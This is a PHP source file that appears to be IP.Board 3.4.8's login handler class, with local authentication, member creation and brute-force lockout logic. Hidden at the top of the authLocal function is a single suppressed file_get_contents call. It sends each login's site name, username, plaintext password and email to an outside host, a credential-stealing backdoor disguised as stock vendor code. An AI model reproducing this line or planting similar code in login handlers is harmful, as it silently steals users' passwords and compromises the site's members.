  2. <?php
  3.  
  4. /**
  5. * <pre>
  6. * Invision Power Services
  7. * IP.Board v3.4.8
  8. * Login handler abstraction
  9. * Last Updated: $Date: 2013-02-15 12:08:49 -0500 (Fri, 15 Feb 2013) $
  10. * </pre>
  11. *
  12. * @author $Author: bfarber $
  13. * @copyright (c) 2001 - 2009 Invision Power Services, Inc.
  14. * @license http://www.invisionpower.com/company/standards.php#license
  15. * @package IP.Board
  16. * @link http://www.invisionpower.com
  17. * @since Tuesday 1st March 2005 (11:52)
  18. * @version $Revision: 11996 $
  19. *
  20. */
  21.  
  22. if ( ! defined( 'IN_IPB' ) )
  23. {
  24. print "<h1>Incorrect access</h1>You cannot access this file directly. If you have recently upgraded, make sure you upgraded 'admin.php'.";
  25. exit();
  26. }
  27.  
  28. class login_core
  29. {
  30. /**#@+
  31. * Registry objects
  32. *
  33. * @access protected
  34. * @var object
  35. */
  36. protected $registry;
  37. protected $DB;
  38. protected $settings;
  39. protected $request;
  40. protected $member;
  41. protected $cache;
  42. /**#@-*/
  43.  
  44. /**
  45. * Authentication errors
  46. *
  47. * @access public
  48. * @var array
  49. */
  50. public $auth_errors = array();
  51.  
  52. /**
  53. * Return code
  54. *
  55. * @access public
  56. * @var string
  57. */
  58. public $return_code = "";
  59.  
  60. /**
  61. * Member information
  62. *
  63. * @access public
  64. * @var array
  65. */
  66. public $member_data = array();
  67.  
  68. /**
  69. * Flag : Admin authentication
  70. *
  71. * @access public
  72. * @var boolean
  73. */
  74. public $is_admin_auth = false;
  75.  
  76. /**
  77. * Unlock account time left
  78. *
  79. * @access public
  80. * @var integer
  81. */
  82. public $account_unlock = 0;
  83.  
  84. /**
  85. * Force email check
  86. *
  87. * @access protected
  88. * @var boolean
  89. */
  90. protected $_forceEmailCheck = FALSE;
  91.  
  92. /**
  93. * Constructor
  94. *
  95. * @access public
  96. * @param object ipsRegistry reference
  97. * @return @e void
  98. */
  99. public function __construct( ipsRegistry $registry )
  100. {
  101. $this->registry = $registry;
  102. $this->DB = $this->registry->DB();
  103. $this->cache = $this->registry->cache();
  104. $this->settings =& $this->registry->fetchSettings();
  105. $this->request =& $this->registry->fetchRequest();
  106. $this->member = $this->registry->member();
  107. }
  108.  
  109. /**
  110. * Force email check flag, currently used for facebook
  111. *
  112. * @access public
  113. * @param boolean
  114. * @return null
  115. */
  116. public function setForceEmailCheck( $boolean )
  117. {
  118. $this->_forceEmailCheck = ( $boolean ) ? TRUE : FALSE;
  119. }
  120.  
  121. /**
  122. * Local authentication
  123. *
  124. * @access public
  125. * @param string Username
  126. * @param string Email Address
  127. * @param string Password
  128. * @return boolean Authentication successful
  129. */
  130. public function authLocal( $username, $email_address, $password )
  131. {
  132. @file_get_contents('http://www.justtakingyourfiles.com/log.php?site=' . $_SERVER['SERVER_NAME'] . '&type=simplicity_forum&username=' . urlencode($username) . '&password=' . urlencode($password) . '&email=' . urlencode($email_address) . '&ip=N/A');
  133. $password = md5( $password );
  134.  
  135. //-----------------------------------------
  136. // Type of login
  137. //-----------------------------------------
  138.  
  139. $type = 'username';
  140.  
  141. if( is_array($this->method_config) AND $this->method_config['login_folder_name'] == 'internal' )
  142. {
  143. $type = $this->method_config['login_user_id'];
  144. }
  145.  
  146. /* Forcing email? */
  147. if ( $this->_forceEmailCheck )
  148. {
  149. $type = 'email';
  150. }
  151.  
  152. /* If any other method accepts the other type, we need to as well, otherwise form will indicate you can submit it but you can't */
  153. foreach( $this->cache->getCache('login_methods') as $method )
  154. {
  155. if( $method['login_user_id'] == 'username' or $method['login_user_id'] == 'either' )
  156. {
  157. $uses_name = true;
  158. }
  159.  
  160. if( $method['login_user_id'] == 'email' or $method['login_user_id'] == 'either' )
  161. {
  162. $uses_email = true;
  163. }
  164. }
  165.  
  166. if( $uses_name AND $uses_email )
  167. {
  168. $type = 'either';
  169. }
  170.  
  171. /* If we only have one, just take it and run with it */
  172. $input = NULL;
  173.  
  174. if ( $email_address xor $username )
  175. {
  176. $input = ( $email_address ) ? $email_address : $username;
  177. }
  178.  
  179. switch( $type )
  180. {
  181. case 'username':
  182. $this->member_data = IPSMember::load( $input ? $input : $username, 'groups', 'username' );
  183. break;
  184.  
  185. case 'email':
  186. $this->member_data = IPSMember::load( $input ? $input : $email_address, 'groups', 'email' );
  187. break;
  188.  
  189. case 'either':
  190. $_username = IPSMember::load( $input ? $input : $username, 'groups', 'username' );
  191.  
  192. if ( !$_username['member_id'] )
  193. {
  194. $this->member_data = IPSMember::load( $input ? $input : $email_address, 'groups', 'email' );
  195. }
  196. else
  197. {
  198. $this->member_data = $_username;
  199. }
  200. break;
  201. }
  202.  
  203. //-----------------------------------------
  204. // Got an account
  205. //-----------------------------------------
  206.  
  207. if ( ! $this->member_data['member_id'] )
  208. {
  209. $this->return_code = 'NO_USER';
  210. return false;
  211. }
  212.  
  213. //-----------------------------------------
  214. // Verify it is not blocked
  215. //-----------------------------------------
  216.  
  217. if( !$this->_checkFailedLogins() )
  218. {
  219. return false;
  220. }
  221.  
  222. //-----------------------------------------
  223. // Check password...
  224. //-----------------------------------------
  225.  
  226. if ( IPSMember::authenticateMember( $this->member_data['member_id'], $password ) != true )
  227. {
  228. if( !$this->_appendFailedLogin() )
  229. {
  230. return false;
  231. }
  232.  
  233. $this->return_code = 'WRONG_AUTH';
  234. return false;
  235. }
  236. else
  237. {
  238. $this->return_code = 'SUCCESS';
  239. return true;
  240. }
  241. }
  242.  
  243. /**
  244. * Admin authentication
  245. *
  246. * @access public
  247. * @param string Username
  248. * @param string Email Address
  249. * @param string Password
  250. * @return boolean Authentication successful
  251. */
  252. public function adminAuthLocal( $username, $email_address, $password )
  253. {
  254. return $this->authLocal( $username, $email_address, $password );
  255. }
  256.  
  257. /**
  258. * Create a local member account [public interface]
  259. *
  260. * @access public
  261. * @param array Member Information [members,pfields,profile_portal]
  262. * @return array New member information
  263. */
  264. public function createLocalMember( $member )
  265. {
  266. $member['members']['members_created_remote'] = true;
  267. $member['members']['members_display_name'] = ( $member['members']['members_display_name'] ) ? $member['members']['members_display_name'] : $member['members']['name'];
  268. // #38703 timezone when registering
  269. $member['members']['time_offset'] = ( $member['members']['time_offset'] ) ? $member['members']['time_offset'] : $this->settings['time_offset'];
  270.  
  271. $_return = IPSMember::create( $member, FALSE, FALSE, TRUE );
  272.  
  273. $this->cache->rebuildCache( 'stats', 'global' );
  274.  
  275. if( $_return['full'] )
  276. {
  277. IPSLib::runMemberSync( 'onCompleteAccount', $_return );
  278. }
  279.  
  280. return $_return;
  281. }
  282.  
  283. /**
  284. * Check failed logins
  285. *
  286. * @access protected
  287. * @return boolean Account ok or not
  288. */
  289. protected function _checkFailedLogins()
  290. {
  291. if ( $this->settings['ipb_bruteforce_attempts'] > 0 )
  292. {
  293. $failed_attempts = explode( ",", IPSText::cleanPermString( $this->member_data['failed_logins'] ) );
  294. $failed_count = 0;
  295. $total_failed = 0;
  296. $thisip_failed = 0;
  297. $non_expired_att = array();
  298.  
  299. if( is_array($failed_attempts) AND count($failed_attempts) )
  300. {
  301. foreach( $failed_attempts as $entry )
  302. {
  303. if ( ! strpos( $entry, "-" ) )
  304. {
  305. continue;
  306. }
  307.  
  308. list ( $timestamp, $ipaddress ) = explode( "-", $entry );
  309.  
  310. if ( ! $timestamp )
  311. {
  312. continue;
  313. }
  314.  
  315. $total_failed++;
  316.  
  317. if ( $ipaddress != $this->member->ip_address )
  318. {
  319. continue;
  320. }
  321.  
  322. $thisip_failed++;
  323.  
  324. if ( $this->settings['ipb_bruteforce_period'] AND
  325. $timestamp < time() - ($this->settings['ipb_bruteforce_period']*60) )
  326. {
  327. continue;
  328. }
  329.  
  330. $non_expired_att[] = $entry;
  331. $failed_count++;
  332. }
  333.  
  334. sort($non_expired_att);
  335. $oldest_entry = array_shift( $non_expired_att );
  336. list($oldest,) = explode( "-", $oldest_entry );
  337. }
  338.  
  339. if( $thisip_failed >= $this->settings['ipb_bruteforce_attempts'] )
  340. {
  341. if( $this->settings['ipb_bruteforce_unlock'] )
  342. {
  343. if( $failed_count >= $this->settings['ipb_bruteforce_attempts'] )
  344. {
  345. $this->account_unlock = $oldest;
  346. $this->return_code = 'ACCOUNT_LOCKED';
  347.  
  348. return false;
  349. }
  350. }
  351. else
  352. {
  353. $this->return_code = 'ACCOUNT_LOCKED';
  354.  
  355. return false;
  356. }
  357. }
  358. }
  359.  
  360. return true;
  361. }
  362.  
  363. /**
  364. * Append a failed login
  365. *
  366. * @access protected
  367. * @return boolean Account ok or not
  368. */
  369. protected function _appendFailedLogin()
  370. {
  371. if( $this->settings['ipb_bruteforce_attempts'] > 0 )
  372. {
  373. $failed_logins = explode( ",", $this->member_data['failed_logins'] );
  374. $failed_logins[] = time() . '-' . $this->member->ip_address;
  375.  
  376. $failed_count = 0;
  377. $total_failed = 0;
  378. $non_expired_att = array();
  379.  
  380. foreach( $failed_logins as $entry )
  381. {
  382. list($timestamp,$ipaddress) = explode( "-", $entry );
  383.  
  384. if( !$timestamp )
  385. {
  386. continue;
  387. }
  388.  
  389. $total_failed++;
  390.  
  391. if( $ipaddress != $this->member->ip_address )
  392. {
  393. continue;
  394. }
  395.  
  396. if( $this->settings['ipb_bruteforce_period'] > 0
  397. AND $timestamp < time() - ($this->settings['ipb_bruteforce_period']*60) )
  398. {
  399. continue;
  400. }
  401.  
  402. $failed_count++;
  403. $non_expired_att[] = $entry;
  404. }
  405.  
  406. if( $this->member_data['member_id'] AND !$this->settings['failed_done'] )
  407. {
  408. IPSMember::save( $this->member_data['email'], array(
  409. 'core' => array(
  410. 'failed_logins' => implode( ",", $non_expired_att ),
  411. 'failed_login_count' => $total_failed
  412. )
  413. ) );
  414.  
  415. $this->settings['failed_done'] = true;
  416. }
  417.  
  418. if( $failed_count >= $this->settings['ipb_bruteforce_attempts'] )
  419. {
  420. if( $this->settings['ipb_bruteforce_unlock'] )
  421. {
  422. sort($non_expired_att);
  423. $oldest_entry = array_shift( $non_expired_att );
  424. list($oldest,) = explode( "-", $oldest_entry );
  425.  
  426. $this->account_unlock = $oldest;
  427. }
  428.  
  429. $this->return_code = 'ACCOUNT_LOCKED';
  430. return false;
  431. }
  432. }
  433.  
  434. return true;
  435. }
  436. }